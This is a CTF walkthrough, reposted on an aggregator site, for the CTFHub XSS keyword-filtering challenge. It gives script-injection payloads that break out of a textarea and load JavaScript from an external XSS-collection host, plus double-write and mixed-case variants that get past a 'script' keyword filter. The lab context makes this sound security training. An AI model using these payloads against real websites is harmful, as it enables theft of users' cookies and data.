CTFHub XSS 过滤关键词 WriteUp

news2025/1/16 4:03:07

前文链接:DOM反射xss

这次直接浏览器输入payload,发现 script 被过滤掉了

</textarea>'"><script src=http://xsscom.com//cZ2vvZ></script>

在这里插入图片描述

碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。

双写绕过

</textarea>'"><scrscriptipt src=http://xsscom.com//cZ2vvZ></scrscriptipt>

大小写绕过

</textarea>'"><Script src=http://xsscom.com//cZ2vvZ></scRipt>

上述两种方式提交后成功在xss平台收到数据:

在这里插入图片描述

提交flag,成功解出

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/732197.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

安装需要的第三方库时,命令行输入pip提示不是内部或外部命令

安装需要的第三方库时,命令行输入pip提示不是内部或外部命令

简介 在做Python开发时&#xff0c;安装需要的第三方库时&#xff0c;大多数人喜欢选择在命令行用pip进行安装。 然而有时敲入pip命令会提示‘pip’不是内部或外部命令。。如图&#xff1a; 解决办法 1、在python安装目录中找得到script文件夹&#xff0c;查看文件夹内部是否…
阅读更多...
解锁开发成果的商业价值,云商店如何与开发者共赢未来?

解锁开发成果的商业价值,云商店如何与开发者共赢未来?

从PC互联网时代到移动互联网时代&#xff0c;用户获取各种应用的方式越来越便捷&#xff0c;只需要动动手指就可以获得自己想要的各种应用&#xff1b;同样&#xff0c;任何一个开发者有好的创意&#xff0c;都可以开发出受欢迎的应用&#xff0c;并获得不菲的商业回报。 尽管…
阅读更多...
1.Git使用技巧-基础原理

1.Git使用技巧-基础原理

Git 使用技巧 文章目录 Git 使用技巧前言一、Git 安装二、搭建服务端仓库三、搭建客户端1. git 通信2. git支持的通信协议本地拉取代码3. 配置用户名和密码查看配置 查看git 帮助Git 工作流程总结参考 前言 Git 是一个开源的分布式代码版本控制系统&#xff0c;用于敏捷高效地…
阅读更多...
sql分页查询

sql分页查询

文章目录 前言一、mysql分页1. limit 102. limit 10,20 二、oracle分页1. ROWNUM2. OFFSET和FETCH 三、PostgreSQL1.LIMIT 42.LIMIT 3 OFFSET 2 总结 前言 分页查询作为数据库必不可少的功能&#xff0c;每家数据库厂商都有各自的标准&#xff0c;下面仅记录目前主流数据库。 …
阅读更多...
E2. Rudolf and Snowflakes (hard version) codeforces1846E2

E2. Rudolf and Snowflakes (hard version) codeforces1846E2

Problem - E2 - Codeforces 题目大意&#xff1a;在无向图中&#xff0c;初始有一个点&#xff0c;然后将k个点连接到1号点上&#xff0c;之后每次操作分别将k歌点连接到之前新加的点上&#xff0c;这样的操作至少有1次&#xff0c;t次询问&#xff0c;每次询问给出一个数n&am…
阅读更多...
ubuntu系统自带的Text Editor编辑器不高亮解决办法

ubuntu系统自带的Text Editor编辑器不高亮解决办法

平时在写launch文件时&#xff0c;我喜欢用ubuntu系统自带的text编辑器&#xff0c;但发现使用text打开launch 文件时&#xff0c;没有高亮功能了&#xff0c;如下图所示&#xff1a; 解决办法非常简单&#xff0c;因为launch和xml文件语法规则类似&#xff0c;只需将text编辑…
阅读更多...
Kotlin~Composite组合模式

Kotlin~Composite组合模式

概念 能够帮助实现树状结构的模式。 主要特点 递归组合树状结构统一处理所有对象 角色介绍 Component: 组合接口Leaf: 叶子节点&#xff0c;无子节点Composite&#xff1a;枝节点&#xff0c;用来存储子部件 UML 代码实现 interface Organ {fun personCount():Int } cla…
阅读更多...
使用 Rust 实现连接远程 Linux 服务器、发送文件、执行命令

使用 Rust 实现连接远程 Linux 服务器、发送文件、执行命令

使用 Rust 实现连接远程 Linux 服务器、发送文件、执行命令 文章目录 使用 Rust 实现连接远程 Linux 服务器、发送文件、执行命令一、Rust 概述使用场景优点缺点 二、功能实现1、代码2、运行日志3、服务器文件 一、Rust 概述 Rust 已经听了无数遍&#xff0c;我很清楚它很强&am…
阅读更多...
windows11终端窗口更换颜色布局

windows11终端窗口更换颜色布局

1.首先我们在windows商店下载powershell 2.访问ohmyposh下载字体https://ohmyposh.dev/docs/installation/fonts https://ohmyposh.dev/docs/installation/fonts 下载完成后解压-选择全部右键-显示更多选项-为所有用户进行安装 3.安装完成后打开power shell&#xff0c;选择设置…
阅读更多...
批量生成工资条和恢复成工资表

批量生成工资条和恢复成工资表

一、问题的提出 人事、财务经常会用到工资条&#xff0c;如果手工添加比较麻烦&#xff0c;而且容易出错&#xff0c;我们可以通过录制宏&#xff0c;或者插入VBA代码的方法来解决。有了VBA后&#xff0c;我们可以定义按钮&#xff0c;绑定VBA代码&#xff0c;实现一键生成工资…
阅读更多...
站在递归的角度上去“观赏”链式二叉树

站在递归的角度上去“观赏”链式二叉树

&#x1f349;博客主页:阿博历练记 &#x1f4d6;文章专栏:数据结构与算法 &#x1f68d;代码仓库:阿博编程日记 &#x1f361;欢迎关注:欢迎友友们点赞收藏关注哦&#x1f339; 文章目录 &#x1f384;链式二叉树&#x1f50d;1.二叉树的框架&#x1f50d;2.二叉树的创建&…
阅读更多...
浅谈RPC协议

浅谈RPC协议

RPC协议 RPC简介为啥需要RPCRPC的调用过程gRPCProtoBuffergRPC实战 RPC简介 RPC&#xff08;Remote Procedure Call Protocol&#xff09;远程过程调用协议&#xff0c;目标就是让远程服务调用更加简单、透明。RPC 框架负责屏蔽底层的传输方式&#xff08;TCP 或者 UDP&#x…
阅读更多...
【数据结构】从树到二叉树

【数据结构】从树到二叉树

目录 ​编辑 一. 前言 二. 树的概念及结构----凉拌海带 2.1 什么是树 2.2 树的基本术语 2.3 树的表示 2.4 树在实际生活中的应用 二. 二叉树的概念及结构----扬州炒饭 2.1 什么是二叉树 2.2 二叉树两种特殊形式 2.3 二叉树的性质 2.4 二叉树的存储结构 三. 链式二叉树基本操…
阅读更多...
MySQL之DQL万字解析(涵盖所有查询!!!)

MySQL之DQL万字解析(涵盖所有查询!!!)

今日金句 生活中有80%的痛苦是来自上班&#xff0c; 但如果不上班&#xff0c;就会有100%的痛苦来自没钱 文章目录 前言一、基础查询1.1 语法1.2 实例 二、条件查询2.1 语法2.2 条件查询实例2.3 模糊查询实例 三 、排序查询3.1 语法3.2 实例 四 、聚合函数4.1 概念4.2 聚合函…
阅读更多...
css:鼠标经过el-dropdown 组件上会出现一个蓝色的小框

css:鼠标经过el-dropdown 组件上会出现一个蓝色的小框

问题描述 效果如下&#xff0c;原以为是浏览器的bug&#xff0c;升级后就好了&#xff0c;没想到一直有这个问题 页面刷新后&#xff0c;鼠标经过el-dropdown 组件上会出现一个蓝色的小框 原因 浏览器默认有一个样式&#xff0c;加了一个边框 :focus-visible {outline: -we…
阅读更多...
应用层:客户-服务器方式(C/S)、对等方式(P2P)

应用层:客户-服务器方式(C/S)、对等方式(P2P)

1.应用层&#xff1a;客户-服务器方式和对等方式 笔记来源&#xff1a; 湖科大教书匠&#xff1a;客户-服务器方式和对等方式 声明&#xff1a;该学习笔记来自湖科大教书匠&#xff0c;笔记仅做学习参考 开发一种新的网络应用首先要考虑的问题就是网络应用程序在各种端系统上的…
阅读更多...
git no matching host key type found. Their offer: ssh-rsa

git no matching host key type found. Their offer: ssh-rsa

本地生成ssh&#xff0c;并配置了服务器SSH Public Keys 问题 拉去远程代码报错 git no matching host key type found. Their offer: ssh-rsa (base) tangsiqitangsiqideMacBook-Pro VDI % git clone "ssh://tangsiqireview.archeros.cn:29418/ArcherDT/vdi-server&…
阅读更多...
通用登录模块(解决多端开发登录策略不同的问题)

通用登录模块(解决多端开发登录策略不同的问题)

文章目录 1、目前登录接口2、问题分析3、解决方案4、使用场景 现在有一个场景&#xff0c;就是需要做登录&#xff0c;但是我们不确定现在移动端的同学做几端&#xff0c;可能会有 手机号登录、账号密码登录、qq登录、微信登录、PC端登录、网页端登录。这些登录的具体实现肯定…
阅读更多...
Go语言基础知识(一):基础介绍

Go语言基础知识(一):基础介绍

一、简介 Go 语言又称 Golang&#xff0c;由 Google 公司于 2009 年发布&#xff0c;近几年伴随着云计算、微服务、分布式的发展而迅速崛起&#xff0c;跻身主流编程语言之列&#xff0c;和 Java 类似&#xff0c;它是一门静态的、强类型的、编译型编程语言&#xff0c;为并发…
阅读更多...
python_day2

python_day2

猜数字-while循环 import randomnum random.randint(1, 10) while True:x int(input("输入&#xff1a;"))if x > num:print("大了")elif x < num:print("小了")else:print("猜对了")break打印九九乘法表-while循环 i 1 wh…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023